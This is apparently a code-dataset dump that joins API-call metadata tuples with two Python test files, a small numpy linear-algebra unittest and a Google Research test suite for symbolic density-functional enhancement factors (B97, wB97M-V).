seaborn as sns\n'), ((11649, 11669), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (11659, 11669), True, 'import matplotlib.pyplot as plt\n'), ((11670, 11695), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Attribution"""'], {}), "('Attribution')\n", (11680, 11695), True, 'import matplotlib.pyplot as plt\n'), ((11696, 11706), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11704, 11706), True, 'import matplotlib.pyplot as plt\n'), ((11718, 11748), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (11730, 11748), True, 'import matplotlib.pyplot as plt\n'), ((11754, 11792), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'layer_attrs_end_dist'}), '(data=layer_attrs_end_dist)\n', (11765, 11792), True, 'import seaborn as sns\n'), ((11793, 11813), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (11803, 11813), True, 'import matplotlib.pyplot as plt\n'), ((11814, 11839), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Attribution"""'], {}), "('Attribution')\n", (11824, 11839), True, 'import matplotlib.pyplot as plt\n'), ((11840, 11850), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11848, 11850), True, 'import matplotlib.pyplot as plt\n'), ((12190, 12241), 'numpy.linalg.norm', 'np.linalg.norm', (['layer_attrs_end_pdf'], {'axis': '(-1)', 'ord': '(1)'}), '(layer_attrs_end_pdf, axis=-1, ord=1)\n', (12204, 12241), True, 'import numpy as np\n'), ((12264, 12297), 'numpy.transpose', 'np.transpose', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12276, 12297), True, 'import numpy as np\n'), ((12320, 12418), 'numpy.divide', 'np.divide', (['layer_attrs_end_pdf', 'layer_attrs_end_pdf_norm'], {'where': '(layer_attrs_end_pdf_norm != 0)'}), '(layer_attrs_end_pdf, layer_attrs_end_pdf_norm, where=\n layer_attrs_end_pdf_norm != 0)\n', (12329, 12418), True, 'import numpy as np\n'), ((12425, 12455), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (12437, 12455), True, 'import matplotlib.pyplot as plt\n'), ((12456, 12485), 'matplotlib.pyplot.plot', 'plt.plot', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12464, 12485), True, 'import matplotlib.pyplot as plt\n'), ((12486, 12504), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Bins"""'], {}), "('Bins')\n", (12496, 12504), True, 'import matplotlib.pyplot as plt\n'), ((12505, 12526), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Density"""'], {}), "('Density')\n", (12515, 12526), True, 'import matplotlib.pyplot as plt\n'), ((12581, 12591), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12589, 12591), True, 'import matplotlib.pyplot as plt\n'), ((12603, 12633), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (12615, 12633), True, 'import matplotlib.pyplot as plt\n'), ((12710, 12738), 'numpy.log2', 'np.log2', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12717, 12738), True, 'import numpy as np\n'), ((12864, 12884), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (12874, 12884), True, 'import matplotlib.pyplot as plt\n'), ((12885, 12916), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Total Attribution"""'], {}), "('Total Attribution')\n", (12895, 12916), True, 'import matplotlib.pyplot as plt\n'), ((12917, 12927), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12925, 12927), True, 'import matplotlib.pyplot as plt\n'), ((2130, 
2177), 'torch.zeros_like', 'torch.zeros_like', (['token_type_ids'], {'device': 'device'}), '(token_type_ids, device=device)\n', (2146, 2177), False, 'import torch\n'), ((2328, 2385), 'torch.arange', 'torch.arange', (['seq_length'], {'dtype': 'torch.long', 'device': 'device'}), '(seq_length, dtype=torch.long, device=device)\n', (2340, 2385), False, 'import torch\n'), ((2409, 2465), 'torch.zeros', 'torch.zeros', (['seq_length'], {'dtype': 'torch.long', 'device': 'device'}), '(seq_length, dtype=torch.long, device=device)\n', (2420, 2465), False, 'import torch\n'), ((2702, 2728), 'torch.ones_like', 'torch.ones_like', (['input_ids'], {}), '(input_ids)\n', (2717, 2728), False, 'import torch\n'), ((5303, 5329), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (5315, 5329), False, 'import torch\n'), ((5335, 5361), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (5347, 5361), False, 'import torch\n'), ((5596, 5620), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (5608, 5620), False, 'import torch\n'), ((5626, 5650), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (5638, 5650), False, 'import torch\n'), ((7218, 7238), 'torch.topk', 'torch.topk', (['attrs', 'k'], {}), '(attrs, k)\n', (7228, 7238), False, 'import torch\n'), ((10234, 10304), 'captum.attr.LayerConductance', 'LayerConductance', (['squad_pos_forward_func2', 'model.bert.encoder.layer[i]'], {}), '(squad_pos_forward_func2, model.bert.encoder.layer[i])\n', (10250, 10304), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((11153, 11180), 'numpy.array', 'np.array', (['layer_attrs_start'], {}), '(layer_attrs_start)\n', (11161, 11180), True, 'import numpy as np\n'), ((11416, 11441), 'numpy.array', 'np.array', (['layer_attrs_end'], {}), '(layer_attrs_end)\n', (11424, 11441), True, 'import numpy as np\n'), ((12820, 12833), 'numpy.arange', 'np.arange', (['(12)'], {}), '(12)\n', (12829, 12833), True, 'import numpy as np\n'), ((355, 380), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (378, 380), False, 'import torch\n'), ((1799, 1839), 'torch.tensor', 'torch.tensor', (['[input_ids]'], {'device': 'device'}), '([input_ids], device=device)\n', (1811, 1839), False, 'import torch\n'), ((1841, 1885), 'torch.tensor', 'torch.tensor', (['[ref_input_ids]'], {'device': 'device'}), '([ref_input_ids], device=device)\n', (1853, 1885), False, 'import torch\n'), ((4983, 5007), 'torch.norm', 'torch.norm', (['attributions'], {}), '(attributions)\n', (4993, 5007), False, 'import torch\n'), ((5259, 5296), 'torch.softmax', 'torch.softmax', (['start_scores[0]'], {'dim': '(0)'}), '(start_scores[0], dim=0)\n', (5272, 5296), False, 'import torch\n'), ((5554, 5589), 'torch.softmax', 'torch.softmax', (['end_scores[0]'], {'dim': '(0)'}), '(end_scores[0], dim=0)\n', (5567, 5589), False, 'import torch\n'), ((11895, 11939), 'numpy.histogram', 'np.histogram', (['attrs'], {'bins': 'bins', 'density': '(True)'}), '(attrs, bins=bins, density=True)\n', (11907, 11939), True, 'import numpy as np\n'), ((12124, 12154), 'numpy.array', 'np.array', (['layer_attrs_end_dist'], {}), '(layer_attrs_end_dist)\n', (12132, 12154), True, 'import numpy as np\n'), ((4281, 4307), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (4293, 4307), False, 'import torch\n'), ((4310, 4334), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (4322, 4334), False, 'import torch\n')]
|
# -*- coding: UTF-8 -*-
from unittest import TestCase
class TestNumpy(TestCase):
def test_dot(self):
from numpy import array, dot
A = array([[1,2],[3,4]], dtype='int32')
B = array([[5,6],[7,8]], dtype='int32')
R = array([[19,22],[43,50]], dtype='int32')
for val in (dot(A,B)-R).flat:
self.assertEqual(val, 0)
u = array([1,1], dtype='int32')
Ru = array([3,7], dtype='int32')
for val in (dot(A,u)-Ru).flat:
self.assertEqual(val, 0)
def test_eig(self):
from numpy import array, dot
from numpy.linalg import eig, inv
A = array([[1,2],[3,4]], dtype='int32')
vals, mat = eig(A)
lbd = dot(dot(inv(mat), A), mat)
for i in range(2):
self.assertAlmostEqual(vals[i], lbd[i,i], places=14)
|
[
"numpy.array",
"numpy.dot",
"numpy.linalg.inv",
"numpy.linalg.eig"
] |
[((157, 195), 'numpy.array', 'array', (['[[1, 2], [3, 4]]'], {'dtype': '"""int32"""'}), "([[1, 2], [3, 4]], dtype='int32')\n", (162, 195), False, 'from numpy import array, dot\n'), ((205, 243), 'numpy.array', 'array', (['[[5, 6], [7, 8]]'], {'dtype': '"""int32"""'}), "([[5, 6], [7, 8]], dtype='int32')\n", (210, 243), False, 'from numpy import array, dot\n'), ((253, 295), 'numpy.array', 'array', (['[[19, 22], [43, 50]]'], {'dtype': '"""int32"""'}), "([[19, 22], [43, 50]], dtype='int32')\n", (258, 295), False, 'from numpy import array, dot\n'), ((380, 408), 'numpy.array', 'array', (['[1, 1]'], {'dtype': '"""int32"""'}), "([1, 1], dtype='int32')\n", (385, 408), False, 'from numpy import array, dot\n'), ((421, 449), 'numpy.array', 'array', (['[3, 7]'], {'dtype': '"""int32"""'}), "([3, 7], dtype='int32')\n", (426, 449), False, 'from numpy import array, dot\n'), ((641, 679), 'numpy.array', 'array', (['[[1, 2], [3, 4]]'], {'dtype': '"""int32"""'}), "([[1, 2], [3, 4]], dtype='int32')\n", (646, 679), False, 'from numpy import array, dot\n'), ((697, 703), 'numpy.linalg.eig', 'eig', (['A'], {}), '(A)\n', (700, 703), False, 'from numpy.linalg import eig, inv\n'), ((313, 322), 'numpy.dot', 'dot', (['A', 'B'], {}), '(A, B)\n', (316, 322), False, 'from numpy import array, dot\n'), ((469, 478), 'numpy.dot', 'dot', (['A', 'u'], {}), '(A, u)\n', (472, 478), False, 'from numpy import array, dot\n'), ((726, 734), 'numpy.linalg.inv', 'inv', (['mat'], {}), '(mat)\n', (729, 734), False, 'from numpy.linalg import eig, inv\n')]
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for symbolic.enhancement_factors."""
import copy
from absl.testing import absltest
from absl.testing import parameterized
import jax
import numpy as np
import sympy
from symbolic_functionals.syfes.symbolic import enhancement_factors
from symbolic_functionals.syfes.symbolic import instructions
from symbolic_functionals.syfes.xc import gga
from symbolic_functionals.syfes.xc import mgga
jax.config.update('jax_enable_x64', True)
class EnhancementFactorTest(parameterized.TestCase):
def setUp(self):
super().setUp()
self.num_features = 2
self.num_shared_parameters = 2
self.num_variables = 3
self.features = {
f'feature_{i}': np.random.rand(5) for i in range(self.num_features)
}
self.shared_parameters = {
f'shared_parameter_{i}': np.random.rand()
for i in range(self.num_shared_parameters)
}
self.bound_parameters = {'gamma_utransform': np.random.rand()}
self.parameters = {**self.shared_parameters, **self.bound_parameters}
self.variables = {
f'variable_{i}': np.zeros(5) for i in range(self.num_variables - 1)
}
self.variables.update({'enhancement_factor': np.zeros(5)})
self.enhancement_factor = enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[
instructions.MultiplicationInstruction(
'variable_0', 'feature_0', 'shared_parameter_0'),
instructions.AdditionInstruction(
'variable_1', 'feature_1', 'shared_parameter_1'),
instructions.AdditionInstruction(
'variable_1', 'variable_1', 'variable_0'),
instructions.Power2Instruction('enhancement_factor', 'variable_1'),
instructions.UTransformInstruction(
'enhancement_factor', 'enhancement_factor')
])
def test_constructor(self):
self.assertEqual(self.enhancement_factor.num_features, self.num_features)
self.assertEqual(self.enhancement_factor.num_parameters,
self.num_shared_parameters + 1) # 1 from UTransform
self.assertEqual(self.enhancement_factor.num_variables, self.num_variables)
def test_constructor_without_enhancement_factor_in_variable_names(self):
with self.assertRaisesRegex(
ValueError, '"enhancement_factor" not found in variable_names.'):
enhancement_factors.EnhancementFactor(
feature_names=[],
shared_parameter_names=[],
variable_names=[],
instruction_list=[])
def test_constructor_with_repeated_name(self):
with self.assertRaisesRegex(ValueError, 'Repeated names found in input.'):
enhancement_factors.EnhancementFactor(
feature_names=['var'],
shared_parameter_names=['var'],
variable_names=['enhancement_factor'],
instruction_list=[])
def test_constructor_with_wrong_instruction_type(self):
with self.assertRaisesRegex(
TypeError, r"1 is of type <class 'int'>, not an "
'instance of instructions.Instruction'):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[1])
@parameterized.parameters(
(instructions.Power2Instruction('variable_0', 'var'),
(r'Instruction variable_0 = var \*\* 2 contains invalid input argument '
'var')),
(instructions.AdditionInstruction('variable_0', 'shared_parameter_1',
'gamma_utransform'),
(r'Instruction variable_0 = shared_parameter_1 \+ gamma_utransform '
'contains invalid input argument gamma_utransform')),
)
def test_constructor_with_invalid_input(self, instruction, error_message):
with self.assertRaisesRegex(ValueError, error_message):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[instruction])
@parameterized.parameters(
(instructions.Power2Instruction('feature_0', 'shared_parameter_0'),
(r'Instruction feature_0 = shared_parameter_0 \*\* 2 contains '
'invalid output argument feature_0')),
(instructions.AdditionInstruction(
'feature_1', 'shared_parameter_1', 'variable_1'),
(r'Instruction feature_1 = shared_parameter_1 \+ variable_1 contains '
'invalid output argument feature_1')
),
(instructions.Power4Instruction(
'bound_parameter_1', 'shared_parameter_1'),
(r'Instruction bound_parameter_1 = shared_parameter_1 \*\* 4 contains '
'invalid output argument bound_parameter_1')
),
)
def test_constructor_with_invalid_output(self, instruction, error_message):
with self.assertRaisesRegex(ValueError, error_message):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[instruction])
@parameterized.parameters(False, True)
def test_eval(self, use_jax):
tmp = (
(self.features['feature_0'] * self.parameters['shared_parameter_0']) +
(self.features['feature_1'] + self.parameters['shared_parameter_1']))
tmp = self.parameters['gamma_utransform'] * tmp ** 2
expected_f = tmp / (1. + tmp)
f = self.enhancement_factor.eval(
self.features, self.parameters, use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_u_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
u = gga.u_b97(x, gamma=gamma_x)
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_u.eval(
features={'u': u},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_u_short_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
u = gga.u_b97(x, gamma=gamma_x)
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_u_short.eval(
features={'u': u},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_x2_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_x2.eval(
features={'x2': x2},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
'gamma': gamma_x
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_x2_short_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_x2_short.eval(
features={'x2': x2},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
'gamma_utransform': gamma_x
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(
(enhancement_factors.f_x_wb97mv,
enhancement_factors.f_css_wb97mv,
enhancement_factors.f_cos_wb97mv,
'gamma'),
(enhancement_factors.f_x_wb97mv_short,
enhancement_factors.f_css_wb97mv_short,
enhancement_factors.f_cos_wb97mv_short,
'gamma_utransform'),
)
def test_wb97mv_enhancement_factors(self,
f_x_wb97mv,
f_css_wb97mv,
f_cos_wb97mv,
gamma_key):
rho = np.random.rand(5)
x = np.random.rand(5)
tau = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
t = mgga.get_mgga_t(rho, tau, polarized=False)
w = (t - 1) / (t + 1)
expected_f_x = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_x'],
power_series=mgga.WB97MV_PARAMS['power_series_x'], polarized=False)
expected_f_css = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_ss'],
power_series=mgga.WB97MV_PARAMS['power_series_ss'], polarized=False)
expected_f_cos = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_os'],
power_series=mgga.WB97MV_PARAMS['power_series_os'], polarized=False)
f_x = f_x_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_x'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_x'][1][2],
'c01': mgga.WB97MV_PARAMS['power_series_x'][2][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_x']})
f_css = f_css_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_ss'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_ss'][1][2],
'c20': mgga.WB97MV_PARAMS['power_series_ss'][2][2],
'c43': mgga.WB97MV_PARAMS['power_series_ss'][3][2],
'c04': mgga.WB97MV_PARAMS['power_series_ss'][4][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_ss']})
f_cos = f_cos_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_os'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_os'][1][2],
'c20': mgga.WB97MV_PARAMS['power_series_os'][2][2],
'c60': mgga.WB97MV_PARAMS['power_series_os'][3][2],
'c21': mgga.WB97MV_PARAMS['power_series_os'][4][2],
'c61': mgga.WB97MV_PARAMS['power_series_os'][5][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_os']})
np.testing.assert_allclose(f_x, expected_f_x)
np.testing.assert_allclose(f_css, expected_f_css)
np.testing.assert_allclose(f_cos, expected_f_cos)
def test_convert_enhancement_factor_to_and_from_dict(self):
self.assertEqual(
self.enhancement_factor,
enhancement_factors.EnhancementFactor.from_dict(
self.enhancement_factor.to_dict()))
@parameterized.parameters(
enhancement_factors.f_empty,
enhancement_factors.f_lda,
enhancement_factors.f_b97_u,
enhancement_factors.f_b97_u_short,
enhancement_factors.f_b97_x2,
enhancement_factors.f_b97_x2_short,
enhancement_factors.f_x_wb97mv,
enhancement_factors.f_css_wb97mv,
enhancement_factors.f_cos_wb97mv,
enhancement_factors.f_x_wb97mv_short,
enhancement_factors.f_css_wb97mv_short,
enhancement_factors.f_cos_wb97mv_short,
)
def test_make_isomorphic_copy(self, enhancement_factor):
features = {
feature_name: np.random.rand(5)
for feature_name in enhancement_factor.feature_names
}
shared_parameters = {
parameter_name: np.random.rand()
for parameter_name in enhancement_factor.shared_parameter_names
}
renamed_shared_parameters = {
(enhancement_factor._isomorphic_copy_shared_parameter_prefix
+ str(index)): value
for index, value in enumerate(shared_parameters.values())
}
bound_parameters = {
parameter_name: np.random.rand()
for parameter_name in enhancement_factor.bound_parameter_names
}
enhancement_factor_copy = enhancement_factor.make_isomorphic_copy()
np.testing.assert_allclose(
enhancement_factor.eval(
features=features, parameters={
**shared_parameters, **bound_parameters}),
enhancement_factor_copy.eval(
features=features, parameters={
**renamed_shared_parameters, **bound_parameters})
)
def test_make_isomorphic_copy_of_f_x_wb97mv_short(self):
f_x_wb97mv_copy = enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy(
feature_names=['rho', 'x2', 'w'],
num_shared_parameters=10,
num_variables=10)
self.assertEqual(f_x_wb97mv_copy.feature_names, ['rho', 'x2', 'w'])
self.assertEqual(f_x_wb97mv_copy.num_shared_parameters, 10)
self.assertEqual(
f_x_wb97mv_copy.shared_parameter_names,
[f_x_wb97mv_copy._isomorphic_copy_shared_parameter_prefix + str(index)
for index in range(10)])
self.assertEqual(
f_x_wb97mv_copy.variable_names,
[f_x_wb97mv_copy._isomorphic_copy_variable_prefix + str(index)
for index in range(9)] + ['enhancement_factor'])
def test_make_isomorphic_copy_enhancement_factor_variable_location(self):
f_x_wb97mv_shuffled = copy.deepcopy(enhancement_factors.f_x_wb97mv_short)
f_x_wb97mv_shuffled.variable_names.remove('enhancement_factor')
f_x_wb97mv_shuffled.variable_names.insert(
np.random.randint(len(f_x_wb97mv_shuffled.variable_names)),
'enhancement_factor')
self.assertEqual(
enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy(),
f_x_wb97mv_shuffled.make_isomorphic_copy())
def test_make_isomorphic_copy_repeated_feature_names(self):
with self.assertRaisesRegex(
ValueError, 'Repeated feature names'):
enhancement_factors.f_b97_u.make_isomorphic_copy(
feature_names=['u', 'u'])
def test_make_isomorphic_copy_wrong_feature_names(self):
with self.assertRaisesRegex(
ValueError,
r"feature_names \['rho', 'x2'\] is not a superset of feature_names of "
r"current instance \['w', 'x2'\]"):
enhancement_factors.f_x_wb97mv.make_isomorphic_copy(
feature_names=['rho', 'x2'])
def test_make_isomorphic_copy_wrong_num_shared_parameters(self):
with self.assertRaisesRegex(
ValueError, 'num_shared_parameters 5 is smaller than '
'that of current instance 6'):
enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy(
num_shared_parameters=5)
def test_make_isomorphic_copy_wrong_num_variables(self):
with self.assertRaisesRegex(
ValueError, 'num_variables 3 is smaller than '
'that of current instance 5'):
enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy(
num_variables=3)
@parameterized.parameters(
(enhancement_factors.f_b97_u, 3),
(enhancement_factors.f_b97_u_short, 3),
(enhancement_factors.f_b97_x2, 4),
(enhancement_factors.f_b97_x2_short, 4),
(enhancement_factors.f_x_wb97mv_short, 4),)
def test_num_used_parameters(
self, enhancement_factor, expected_num_used_parameters):
self.assertEqual(enhancement_factor.num_used_parameters,
expected_num_used_parameters)
self.assertEqual(
enhancement_factor.make_isomorphic_copy(
num_shared_parameters=20).num_used_parameters,
expected_num_used_parameters)
def test_get_symbolic_expression(self):
c0, c1, c2, gamma, x = sympy.symbols(
'c0 c1 c2 gamma_utransform x')
self.assertEqual(
enhancement_factors.f_b97_x2_short.get_symbolic_expression(
latex=False, simplify=False),
(c0 + c1 * gamma * x ** 2 / (gamma * x ** 2 + 1.)
+ c2 * gamma ** 2 * x ** 4 / (gamma * x ** 2 + 1.) ** 2))
def test_get_symbolic_expression_latex(self):
self.assertEqual(
enhancement_factors.f_b97_x2_short.get_symbolic_expression(
latex=True, simplify=False),
r'c_{0} + \frac{c_{1} \gamma_{u} x^{2}}{\gamma_{u} x^{2} + 1.0} + '
r'\frac{c_{2} \gamma_{u}^{2} x^{4}}{\left(\gamma_{u} x^{2} + '
r'1.0\right)^{2}}')
if __name__ == '__main__':
absltest.main()
|
[
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.eval",
"numpy.random.rand",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression",
"symbolic_functionals.syfes.symbolic.instructions.MultiplicationInstruction",
"copy.deepcopy",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2.eval",
"symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction",
"symbolic_functionals.syfes.xc.mgga.get_mgga_t",
"numpy.testing.assert_allclose",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.make_isomorphic_copy",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy",
"symbolic_functionals.syfes.symbolic.enhancement_factors.EnhancementFactor",
"symbolic_functionals.syfes.symbolic.instructions.Power2Instruction",
"symbolic_functionals.syfes.xc.gga.u_b97",
"absl.testing.absltest.main",
"symbolic_functionals.syfes.xc.gga.f_b97",
"sympy.symbols",
"symbolic_functionals.syfes.xc.mgga.f_b97m",
"symbolic_functionals.syfes.symbolic.instructions.Power4Instruction",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.eval",
"jax.config.update",
"symbolic_functionals.syfes.symbolic.instructions.UTransformInstruction",
"absl.testing.parameterized.parameters",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u_short.eval",
"numpy.zeros",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv.make_isomorphic_copy"
] |
[((1008, 1049), 'jax.config.update', 'jax.config.update', (['"""jax_enable_x64"""', '(True)'], {}), "('jax_enable_x64', True)\n", (1025, 1049), False, 'import jax\n'), ((6022, 6059), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (6046, 6059), False, 'from absl.testing import parameterized\n'), ((6499, 6536), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (6523, 6536), False, 'from absl.testing import parameterized\n'), ((7010, 7047), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (7034, 7047), False, 'from absl.testing import parameterized\n'), ((7533, 7570), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (7557, 7570), False, 'from absl.testing import parameterized\n'), ((8075, 8112), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (8099, 8112), False, 'from absl.testing import parameterized\n'), ((8640, 8932), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (["(enhancement_factors.f_x_wb97mv, enhancement_factors.f_css_wb97mv,\n enhancement_factors.f_cos_wb97mv, 'gamma')", "(enhancement_factors.f_x_wb97mv_short, enhancement_factors.\n f_css_wb97mv_short, enhancement_factors.f_cos_wb97mv_short,\n 'gamma_utransform')"], {}), "((enhancement_factors.f_x_wb97mv,\n enhancement_factors.f_css_wb97mv, enhancement_factors.f_cos_wb97mv,\n 'gamma'), (enhancement_factors.f_x_wb97mv_short, enhancement_factors.\n f_css_wb97mv_short, enhancement_factors.f_cos_wb97mv_short,\n 'gamma_utransform'))\n", (8664, 8932), False, 'from absl.testing import parameterized\n'), ((11615, 12069), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['enhancement_factors.f_empty', 'enhancement_factors.f_lda', 'enhancement_factors.f_b97_u', 'enhancement_factors.f_b97_u_short', 'enhancement_factors.f_b97_x2', 'enhancement_factors.f_b97_x2_short', 'enhancement_factors.f_x_wb97mv', 'enhancement_factors.f_css_wb97mv', 'enhancement_factors.f_cos_wb97mv', 'enhancement_factors.f_x_wb97mv_short', 'enhancement_factors.f_css_wb97mv_short', 'enhancement_factors.f_cos_wb97mv_short'], {}), '(enhancement_factors.f_empty, enhancement_factors.\n f_lda, enhancement_factors.f_b97_u, enhancement_factors.f_b97_u_short,\n enhancement_factors.f_b97_x2, enhancement_factors.f_b97_x2_short,\n enhancement_factors.f_x_wb97mv, enhancement_factors.f_css_wb97mv,\n enhancement_factors.f_cos_wb97mv, enhancement_factors.f_x_wb97mv_short,\n enhancement_factors.f_css_wb97mv_short, enhancement_factors.\n f_cos_wb97mv_short)\n', (11639, 12069), False, 'from absl.testing import parameterized\n'), ((15622, 15854), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(enhancement_factors.f_b97_u, 3)', '(enhancement_factors.f_b97_u_short, 3)', '(enhancement_factors.f_b97_x2, 4)', '(enhancement_factors.f_b97_x2_short, 4)', '(enhancement_factors.f_x_wb97mv_short, 4)'], {}), '((enhancement_factors.f_b97_u, 3), (\n enhancement_factors.f_b97_u_short, 3), (enhancement_factors.f_b97_x2, 4\n ), (enhancement_factors.f_b97_x2_short, 4), (enhancement_factors.\n f_x_wb97mv_short, 4))\n', (15646, 15854), False, 'from absl.testing import parameterized\n'), ((17014, 17029), 'absl.testing.absltest.main', 'absltest.main', ([], {}), '()\n', (17027, 17029), False, 'from absl.testing 
